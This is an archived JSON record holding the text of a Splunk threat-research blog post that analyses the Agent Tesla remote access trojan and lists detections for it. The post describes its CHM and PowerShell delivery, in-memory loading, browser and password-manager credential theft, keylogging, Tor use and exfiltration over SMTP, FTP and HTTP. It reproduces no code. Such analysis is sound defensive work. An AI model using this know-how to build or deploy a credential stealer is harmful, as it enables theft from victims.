{
	"id": "eab8222d-003a-44d4-9803-2de3afd70bf7",
	"created_at": "2026-04-06T00:19:06.298268Z",
	"updated_at": "2026-04-10T03:21:04.048507Z",
	"deleted_at": null,
	"sha1_hash": "bcae3dd680236d160a2989761563bb24cfa61c05",
	"title": "Inside the Mind of a ‘Rat’ - Agent Tesla Detection and Analysis | Splunk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6679365,
	"plain_text": "Inside the Mind of a ‘Rat’ - Agent Tesla Detection and Analysis |\r\nSplunk\r\nBy Splunk Threat Research Team\r\nPublished: 2022-11-16 · Archived: 2026-04-05 15:53:44 UTC\r\nAgent Tesla is a remote access trojan (RAT) written for the .NET framework that has knowingly been in operation\r\nsince 2014. Threat actors behind this malware have leveraged many different methods to deliver their payload\r\nover time including macro enabled Word documents, Microsoft Office vulnerabilities, OLE objects and most\r\nrecently, compiled HTML help files. Agent Tesla has been in the top 10 most submitted samples in known open\r\nmalware source repositories in cyber security communities like Malware Bazaar and Any.run. It is a full-featured\r\nRAT with multiple ways to exfiltrate organization data through keylogging, screen captures, credential stealing\r\nand much more.\r\nIn this blog post, the Splunk Threat Research Team (STRT) describes the different tactics, techniques and\r\nprocedures mapped to the ATT\u0026CK framework leveraged by this remote access trojan. Additionally, we will\r\nhighlight the detection analytics we released that can help cyber defenders in identifying signs of compromise.\r\nAnalysis\r\nIdentification of Samples\r\nFor this analysis, the STRT started the journey with a sample uploaded by JAMESWT_MHT on August 31st to\r\nMalware Bazaar. This sample led us to the “ftp-boloni-ma” tag that compiles several samples of a campaign\r\nleveraging the Agent Tesla malware. Specifically, this campaign used a malicious compiled HTML (.CHM) file as\r\na delivery method to drop and execute its first and second stages and load the remote access trojan.\r\nHigh level flow of process execution for this sample is shown on Figure 1:\r\nFigure 1.1 shows the list of hashes that have this tag.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 1 of 15\n\nSecurity teams that would like to understand how the execution of compiled HTML files looks like against their\r\nprevention or detection controls, we recommend having a look at the AtomicTestHarness for CHM and the Atomic\r\nRed Team technique T1218.001 built by the Red Canary team.\r\nT1566.001 - Spear Phishing Attachment\r\nThis Agent Tesla variant uses a compiled HTML file (.chm) to conceal its malicious code and gain an initial\r\nfoothold on the victim endpoint. The file has an embedded and obfuscated JavaScript script that invokes\r\nPowerShell to download a second stage.\r\nFigure 1.1 shows the .chm file loading upon execution.\r\nFigure 1.2 shows the obfuscated and deobfuscated versions of the embedded Javascript code. Once executed, it\r\nwill invoke PowerShell.exe to download extra content from the Internet using the System.Net WebClient class and\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 2 of 15\n\nthe DownloadString method.\r\nThe Loader\r\nT1059.001 - Command and Scripting Interpreter: PowerShell\r\nThe downloaded file, disguised as a text .txt file, is in reality a PowerShell script shown on Figure 2. This\r\nobfuscated second stage script is the one responsible for loading the actual Agent Tesla malware in memory.\r\nThe variable named $TzbW contains a string that when deobfuscated, implements the tMCfkSD function also\r\nshown on Figure 2. This function will in turn deobfuscate and decompress the array of bytes stored in the variable\r\nnamed $zmOo. This deobfuscated and decompressed version is the actual .NET assembly Agent Tesla malware\r\nthat will be executed in memory using PowerShell reflection.\r\nFigure 2 shows the main parts of this second stage component and the gzip decompression function.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 3 of 15\n\nFigure 2.1 shows a screenshot of a simple python script we wrote to deobfuscate the PowerShell function Agent\r\nTesla’s second stage uses to decompress and deobfuscate the binary stored in the $zmOo array byte variable. The\r\npython script can be found on Github agent_function_loader_deobfus.py\r\nThis loader will deobfuscate and load the Agent Tesla malware in memory stream using .NET Reflection. This\r\npart of its execution can be considered as fileless malware since it doesn't drop the AgentTesla malware on the\r\ndisk but executes it in memory stream.\r\nFigure 2.2 shows the python script we wrote to extract the actual AgentTesla malware binary. This python script\r\nwill drop the Agent Tesla malware as agent_unpack.bin in the current working directory. The script can be found\r\non Github agent_function_loader_deobfus2.py.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 4 of 15\n\nAgent Tesla Analysis\r\nPacker/ Obfuscator\r\nThe Agent Tesla sample extracted in the second stage component is a .NET compiled binary obfuscated with the\r\nopensource Obfuscar .NET obfuscator. Using the DIE tool we can identify the obfuscation method and the\r\ncompilation type of this file in Figure 3. Adversaries will pack or obfuscate their payloads in hope that it evades\r\ncritical controls like mail gateways, sandboxes and anti-virus software.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 5 of 15\n\nDiscovery - TA0007\r\nT1033 - System Owner/User Discovery\r\nOn every check in to the command and control server (via the FTP, HTTP or SMTP protocols), this Agent Tesla\r\nsample parses and submites the user name, computer name, operating system version and total physical memory\r\nof the compromised endpoint.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 6 of 15\n\nFigure 4\r\nExecution - TA0002\r\nT1204.002 - Malicious File\r\nThis particular Agent Tesla sample includes the ability to download a remote file from one of its C2 servers and\r\nsave it to the hardcoded path “%temp%\\LUU”. The final step of the function will also execute the downloaded\r\nfile. Unfortunately the URL was inaccessible as of writing.\r\nFigure 4 shows the code snippet of how it captures the system information of the compromised machine as part of\r\nits C2 communication.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 7 of 15\n\nPersistence - TA0003\r\nT1547.001 - Registry Run / Startup Folder\r\nIf enabled, Agent Tesla has two built in persistence mechanisms to be able to load itself upon boot. It is either by\r\ndropping a copy of itself in the %startup folder% or by adding registry run keys.\r\nFigure 5.1 and Figure 5.2 shows a short code snippet how it can create Registry Run Keys and possible entry on\r\nstartup folder for its persistence(T1547.001).\r\nFigure 5.1\r\nFigure 5.2\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 8 of 15\n\nCredential Access - TA0006\r\nAgent Tesla implements several techniques to collect sensitive information on the compromised endpoint.\r\nT1555.003 - Credentials from Web Browsers\r\nThe first technique is parsing credentials or sensitive browser data. Agent Tesla includes a list of targeted browsers\r\nto parse the login credentials, browser cookies, browser profiles and grab browser .sqlite database files. Figure 6\r\nshows a short code snippet of the function renamed as “mw_parsing_browser_db” that contains the list of\r\nbrowsers that Agent Tesla attempts to parse or copy the “cookies.sqlite” database file.\r\nBelow is a complete table list of targeted browsers.\r\nT1555.005 - Password Managers\r\nAside from stealing browser secrets, it also attempts to steal passwords from commonly used applications like\r\nOpenVpn, FileZilla and Mailbird. It accomplishes this by reading registry entries, decrypting/decoding or parsing\r\nlocal databases or by reading configuration files. The table below is the list of the targeted applications that are\r\nrelated to this data collection.\r\nT1056.001 - KeyLogging\r\nThis Agent Tesla sample is also capable of installing a Keylogger on the compromised host. It uses the\r\nSetWindowsHookEx Windows API to install a hook procedure that monitors low-level keyboard input events.\r\nFigure 7 shows the code snippet where it setup the windows hook procedure for keyboard events.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 9 of 15\n\nFigure 7\r\nCommand And Control - TA0011\r\nT1090.003 - TOR Proxy\r\nAgent Tesla also uses TOR proxy for its HTTP requests. It tries to download a TOR application on a specific TOR\r\nwebsite. Figure 8 shows its function that downloads the TOR browser that will be saved as “tor.zip” file in\r\nthe%appdata% folder.\r\nFigure 8\r\nCollection - TA0009\r\nT1113 - Screen Capture\r\nFigure 9 shows the code snippet of how Agent Tesla software captures the desktop screenshot of the compromised\r\nmachine and it will be saved in the memory stream and later sent to its C2 server.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 10 of 15\n\nFigure 9\r\nExfiltration - TA0010\r\nT1041 - Exfiltration Over C2 Channel\r\nDuring analysis of this Agent Tesla sample it was identified to have 3 ways to exfiltrate stolen sensitive\r\ninformation of the compromised host. The exfiltrated data may be either sent via FTP, SMTP and HTTP command\r\nand control server. Figure 10 shows the code snippet on how the agent will set up each method to exfiltrate data.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 11 of 15\n\nThe remote C2 server was down during the analysis of this sample. STRT experimented with its SMTP\r\ncommunication to be able to see how the exfiltrated data looks like on the attacker side. We used a fake SMTP\r\nserver by rnwood (smtp4dev) to forward all the exfiltrated data of this sample.\r\nAttacker Perspective\r\nData Exfiltration\r\nFigure 11 shows the email sent by the Agent Tesla to the fake SMTP server containing a .zip file attachment with\r\nthe filename format “CO_\u003cusername\u003e/\u003cComputerName\u003e\u003cDateTime\u003e.zip”.\r\nThis .zip file contains the collected browser data, which in our case is the cookie.sqlite file.\r\nIn addition, it includes the basic system information which is the UserName, ComputerName, OSFullName, CPU\r\nand RAM.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 12 of 15\n\nFigure 11\r\nFigure 12 shows the email sent by the Agent Tesla malware related to the desktop screenshots of the compromised\r\nmachine. We can see that it has same format email body that contain system information, except that the format of\r\nthe desktop screenshot .jpeg file is “SC_\u003cusername\u003e/\u003cComputerName\u003e\u003cDateTime\u003e.jpeg”\r\nFigure 12\r\nLastly Figure 13.1 (notepad++) and 13.2 (firefox) shows the email sent by this sample during our testing related to\r\nits keylogging feature. This malware checks if the log.tmp (keylog file) in %temp% exists; if not, it will directly\r\nsend the keystroke that keylogs in its C2, in this case via SMTP.\r\nBelow shows the couple of keys typed by the user and the process related to that keystroke.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 13 of 15\n\nFigure 13.1\r\nFigure 13.2\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 14 of 15\n\nFor this type of exfiltration the subject of the email has a format of “KL_\u003cusername\u003e/\u003cComputerName\u003e”.\r\nDetections\r\nBelow is the table list for detections that the STRT developed to identify possible Agent Tesla behavior and\r\nmalicious .chm behavior.\r\nAutomate with SOAR Playbooks\r\nAll of the previously listed detections create entries in the risk index by default, and can be used seamlessly with\r\nrisk notables and the Risk Notable Playbook Pack. The community Splunk SOAR playbooks below can also be\r\nused in conjunction with some of the previously described analytics:\r\nWhy Should You Care?\r\nWith this article the Splunk Threat Research Team (STRT) enables security analysts, blue teamers and Splunk\r\ncustomers to identify the Agent Tesla tactics, techniques and procedures. By understanding its behaviors, we were\r\nable to generate telemetry and datasets to develop and test Splunk detections designed to defend and respond\r\nagainst this type of threats.\r\nLearn More\r\nYou can find the latest content about security analytic stories on GitHub and in Splunkbase. Splunk Security\r\nEssentials also has all these detections now available via push update.\r\nFor a full list of security content, check out the release notes on Splunk Docs.\r\nFeedback\r\nAny feedback or requests? Feel free to put in an issue on Github and we’ll follow up. Alternatively, join us on the\r\nSlack channel #security-research. Follow these instructions if you need an invitation to our Splunk user groups on\r\nSlack.\r\nContributors\r\nWe would like to thank Teoderick Contreras, Michael Haag, Mauricio Velazco and Lou Stella for their\r\ncontributions to this post.\r\nSource: https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 15 of 15",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html"
	],
	"report_names": [
		"inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434746,
	"ts_updated_at": 1775791264,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bcae3dd680236d160a2989761563bb24cfa61c05.pdf",
		"text": "https://archive.orkl.eu/bcae3dd680236d160a2989761563bb24cfa61c05.txt",
		"img": "https://archive.orkl.eu/bcae3dd680236d160a2989761563bb24cfa61c05.jpg"
	}
}